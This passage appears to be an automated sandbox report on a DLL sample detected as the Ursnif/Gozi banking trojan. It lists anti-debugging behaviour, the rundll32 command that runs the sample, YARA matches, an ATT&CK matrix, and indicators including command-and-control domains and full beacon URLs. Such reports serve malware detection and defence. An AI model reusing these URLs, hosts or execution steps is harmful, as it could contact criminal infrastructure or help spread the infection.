Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E86DBB5 push dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort (6 occurrences)
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6952 -s 640
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E806CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E7FB316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E806CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E7FB316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                      HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: areuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.97.161.50 187
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: breuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.office365.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.97.151.2 187
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 13.82.28.61 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.97.151.66 187
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6952 -s 640
                      Source: loaddll32.exe, 00000000.00000002.827633044.0000000001500000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.541716339.0000000003190000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.829291690.00000000030A0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.562409150.0000000002BC0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.551988515.0000000002C30000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: loaddll32.exe, 00000000.00000002.827633044.0000000001500000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.541716339.0000000003190000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.829291690.00000000030A0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.562409150.0000000002BC0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.551988515.0000000002C30000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.827633044.0000000001500000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.541716339.0000000003190000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.829291690.00000000030A0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.562409150.0000000002BC0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.551988515.0000000002C30000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.827633044.0000000001500000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.541716339.0000000003190000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.829291690.00000000030A0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.562409150.0000000002BC0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.551988515.0000000002C30000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C4A82B cpuid
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7C1172 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E81FF15 _free,_free,_free,GetTimeZoneInformation,_free,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7C1825 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C4A82B RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match | File source: 00000003.00000002.829711196.0000000004CD0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.573182276.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.575886663.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.577592974.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.577142287.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.621678183.0000000004F4B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.574590732.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.573615076.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.828440646.00000000030D0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.574198555.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.573998703.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.576726243.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.619056224.000000000334B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.577395162.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.578289206.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.576921901.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.573750690.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.573091337.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.707612619.000000000314F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.574533141.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.711256543.0000000004D4F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.576829931.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.664577952.000000000324D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.667981816.0000000004E4D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.577047375.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.576567742.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 6444, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4352, type: MEMORYSTR
Source: Yara match | File source: 2.3.rundll32.exe.2f3a31a.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.2f194a0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.2f3a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.loaddll32.exe.d5a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.rundll32.exe.68a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.rundll32.exe.4da31a.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.49494a0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.rundll32.exe.68a31a.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.c40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.6e7c0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.49494a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.loaddll32.exe.d5a31a.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.8da31a.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.8da31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.rundll32.exe.4da31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.2f194a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.8f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.6e7c0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.828285916.0000000002F19000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.512556680.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.492597168.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.829472336.0000000004949000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.512003320.00000000004D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.506220086.0000000000680000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.492790466.0000000002F30000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match | File source: 00000003.00000002.829711196.0000000004CD0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.573182276.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.575886663.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.577592974.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.577142287.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.621678183.0000000004F4B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.574590732.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.573615076.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.828440646.00000000030D0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.574198555.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.573998703.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.576726243.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.619056224.000000000334B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.577395162.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.578289206.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.576921901.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.573750690.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.573091337.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.707612619.000000000314F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.574533141.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.711256543.0000000004D4F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.576829931.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.664577952.000000000324D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.667981816.0000000004E4D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.577047375.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.576567742.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 6444, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4352, type: MEMORYSTR
Source: Yara match | File source: 2.3.rundll32.exe.2f3a31a.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.2f194a0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.2f3a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.loaddll32.exe.d5a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.rundll32.exe.68a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.rundll32.exe.4da31a.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.49494a0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.rundll32.exe.68a31a.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.c40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.6e7c0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.49494a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.loaddll32.exe.d5a31a.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.8da31a.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.8da31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.rundll32.exe.4da31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.2f194a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.8f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.6e7c0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.828285916.0000000002F19000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.512556680.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.492597168.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.829472336.0000000004949000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.512003320.00000000004D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.506220086.0000000000680000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.492790466.0000000002F30000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 2 | Path Interception | Process Injection 112 | Disable or Modify Tools 1 | OS Credential Dumping | System Time Discovery 2 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Native API 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion 1 | LSASS Memory | Security Software Discovery 21 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 112 | Security Account Manager | Virtualization/Sandbox Evasion 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information 1 | NTDS | Process Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 14 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information 2 | LSA Secrets | Account Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Rundll32 1 | Cached Domain Credentials | System Owner/User Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | Remote System Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery 23 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |

Behavior Graph

[Behavior graph image not reproduced; the node and edge data recovered from the graph text follows.]
Behavior Graph ID: 500399; Sample: m87xfb63XU.dll; Startdate: 12/10/2021; Architecture: WINDOWS; Score: 88
Start node: DNS/IP node outlook.com; signatures: Found malware configuration, Multi AV Scanner detection for submitted file, Yara detected Ursnif; starts loaddll32.exe
loaddll32.exe: DNS/IP nodes breuranel.website, areuranel.website and 9 other IPs or domains; signatures: Writes or reads registry keys via WMI, Writes registry values via WMI; starts rundll32.exe (three instances) and cmd.exe
rundll32.exe (first instance started by loaddll32.exe): signatures: System process connects to network (likely due to code injection or exploit), Writes registry values via WMI; starts WerFault.exe
cmd.exe: starts rundll32.exe
rundll32.exe (started by cmd.exe): DNS/IP nodes 52.97.151.2 port 443 (local port 49797, MICROSOFT-CORP-MSN-AS-BLOCKUS, United States), breuranel.website and 10 other IPs or domains; signature: System process connects to network (likely due to code injection or exploit)
rundll32.exe (second and third instances started by loaddll32.exe): the second instance starts two WerFault.exe processes, the third starts one

Screenshots

[Screenshot thumbnails not reproduced in text.]

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
m87xfb63XU.dll | 22% | ReversingLabs | Win32.Infostealer.Gozi

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
3.2.rundll32.exe.8f0000.0.unpack | 100% | Avira | HEUR/AGEN.1108168
0.2.loaddll32.exe.c40000.0.unpack | 100% | Avira | HEUR/AGEN.1108168

                      Domains

                      No Antivirus matches

URLs

Source | Detection | Scanner | Label
https://breuranel.website/liopolo/wv4vNBBA798s7/I_2FCPxa/4F4kPL6kvjyV14SrT2YW8wi/GOKS69LDnM/P4sY8Z0h | 0% | Avira URL Cloud | safe
https://breuranel.website/ | 0% | Avira URL Cloud | safe
http://docs.oasis-op | 0% | Avira URL Cloud | safe
https://deff.nelreports.net/api/report?cat=msn | 0% | URL Reputation | safe
https://areuranel.website/liopolo/C_2BfXb0gV5jtbUa/IZmGbVhjqtQp_2F/7qZce0oXF332X4bIP1/uoX46bOOY/izB1 | 0% | Avira URL Cloud | safe
https://mem.gfx.ms/meversion/?partner=msn&market=en-us" | 0% | Avira URL Cloud | safe
https://breuranel.website/liopolo/53U65wbAztycwApkbN/Nm6o3zX96/bvCraxUdm00FZ4WM5Wps/p_2FNPk5Ls6JTWqI | 0% | Avira URL Cloud | safe
https://areuranel.website/# | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
msn.com | 13.82.28.61 | true | false | | high
outlook.com | 40.97.161.50 | true | false | | high
HHN-efz.ms-acdc.office.com | 40.101.60.226 | true | false | | high
FRA-efz.ms-acdc.office.com | 52.97.151.66 | true | false | | high
www.msn.com | unknown | unknown | false | | high
www.outlook.com | unknown | unknown | false | | high
areuranel.website | unknown | unknown | true | | unknown
breuranel.website | unknown | unknown | true | | unknown
outlook.office365.com | unknown | unknown | false | | high

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://www.outlook.com/signup/liopolo/_2F1953bLKh6Aa9Zni5pUB/uu476XRXRXdwS/zStiAL1i/ws5BIrlWLA2GdJ9e0xq88Zi/DBztcvZHmo/mcGQqmXKrqNjP4iG6/7aTDT9GSE9D6/8jXJ0EFBBnJ/89lvGSm0UsN_2B/DpWUyWVECg62e9A86zQtW/yv5TQxo2fX2Xv7gp/5xHugEiGC5l_2Bc/jIp0JWV7N33_2F/EkcA.jre | false | | high
https://outlook.office365.com/signup/liopolo/_2F1953bLKh6Aa9Zni5pUB/uu476XRXRXdwS/zStiAL1i/ws5BIrlWLA2GdJ9e0xq88Zi/DBztcvZHmo/mcGQqmXKrqNjP4iG6/7aTDT9GSE9D6/8jXJ0EFBBnJ/89lvGSm0UsN_2B/DpWUyWVECg62e9A86zQtW/yv5TQxo2fX2Xv7gp/5xHugEiGC5l_2Bc/jIp0JWV7N33_2F/EkcA.jre | false | | high
https://msn.com/mail/liopolo/r_2FdFpkR4VdtsN08a/_2BmiRrdo/iRPVi0tWAScg5sVGfo66/hUF_2BDb_2BTvse5vT2/OGVc4TNxI8ONXMjzPJH1kn/iiKryEX2ymN0T/2YX_2Bs_/2FUMTLKLdgRo4Z6EcuiEOOc/8fsAz5_2Fq/UDZOXONJb9G0Jl7Sh/YwJHU3HBZfrx/Rr2RrnGmK6E/ePg9xCsP_2FGO_/2FHvWeMzr/F7gd5.jre | false | | high
https://msn.com/mail/liopolo/QXqV1Cwmdgy9RAxuvo/eyRDOSF4h/n5Xdvl6macAzIHUi6g_2/FnMxm3OFSbW9k15b3rD/GOZ7HTzmadDT3EaU6FMaux/8v8OfzSGDIfuI/2JFzbGpa/48oXcRIDJ4CWvryCIOce07l/PRm5ekLf_2/FWrUO776bg5a24LJQ/ndIkg4SZse4c/jL7OG2Z00xG/sTPur68E_2BxS_/2FjGzTP4SxNpm_2FiKI7j/WPoFKl4.jre | false | | high
https://outlook.com/signup/liopolo/_2F1953bLKh6Aa9Zni5pUB/uu476XRXRXdwS/zStiAL1i/ws5BIrlWLA2GdJ9e0xq88Zi/DBztcvZHmo/mcGQqmXKrqNjP4iG6/7aTDT9GSE9D6/8jXJ0EFBBnJ/89lvGSm0UsN_2B/DpWUyWVECg62e9A86zQtW/yv5TQxo2fX2Xv7gp/5xHugEiGC5l_2Bc/jIp0JWV7N33_2F/EkcA.jre | false | | high
https://msn.com/mail/liopolo/jpKr3VzL6CFU/K4QwQLlZ56e/n3MZDuNS62Sf0R/mD2lfs_2FQXwlgYrd0DFL/pEDSMAvGReZoZ8Jm/OSgzsTstfQRz_2F/2Bp8zA9yijiTKRH09Q/Mwm_2F7JH/xI5SfnAXURadBpSsyjtC/_2BEE4TT4VBjXUCp_2B/cYd5vNurcHADHrS6HheJd6/UAnImB8Jw2Ynr/9pKHwbRP/FStf.jre | false | | high

                                                    URLs from Memory and Binaries


Contacted IPs


Public

IP             Domain                      Country        ASN   ASN Name                       Malicious
52.97.151.2    unknown                     United States  8075  MICROSOFT-CORP-MSN-AS-BLOCKUS  true
52.97.151.82   unknown                     United States  8075  MICROSOFT-CORP-MSN-AS-BLOCKUS  false
40.97.161.50   outlook.com                 United States  8075  MICROSOFT-CORP-MSN-AS-BLOCKUS  false
13.82.28.61    msn.com                     United States  8075  MICROSOFT-CORP-MSN-AS-BLOCKUS  false
40.101.60.226  HHN-efz.ms-acdc.office.com  United States  8075  MICROSOFT-CORP-MSN-AS-BLOCKUS  false
52.97.151.66   FRA-efz.ms-acdc.office.com  United States  8075  MICROSOFT-CORP-MSN-AS-BLOCKUS  false

General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 500399
Start date: 12.10.2021
Start time: 00:19:50
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 3s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: m87xfb63XU.dll
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 29
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal88.troj.evad.winDLL@17/12@22/6
EGA Information: Failed
HDC Information:
• Successful, ratio: 16.6% (good quality ratio 15.9%)
• Quality average: 77.1%
• Quality standard deviation: 29%
HCA Information:
• Successful, ratio: 72%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .dll
• Override analysis time to 240s for rundll32
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 13.107.4.50, 20.199.120.151, 52.184.81.210, 2.20.178.33, 2.20.178.24, 204.79.197.203, 20.190.160.132, 20.190.160.4, 20.190.160.8, 20.190.160.6, 20.190.160.136, 20.190.160.129, 20.190.160.67, 20.190.160.134, 20.42.65.92, 13.89.179.12, 20.82.209.183, 20.54.110.249, 40.112.88.60, 20.199.120.85
• Excluded domains from analysis (whitelisted): www.tm.lg.prod.aadmsa.akadns.net, b1ns.c-0001.c-msedge.net, onedsblobprdcus17.centralus.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, b1ns.au-msedge.net, client.wns.windows.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, a-0003.a-msedge.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, c-0001.c-msedge.net, www-msn-com.a-0003.a-msedge.net, www.tm.a.prd.aadg.akadns.net, iris-de-prod-azsc-eas-b.eastasia.cloudapp.azure.com, login.msa.msidentity.com, ris.api.iris.microsoft.com, 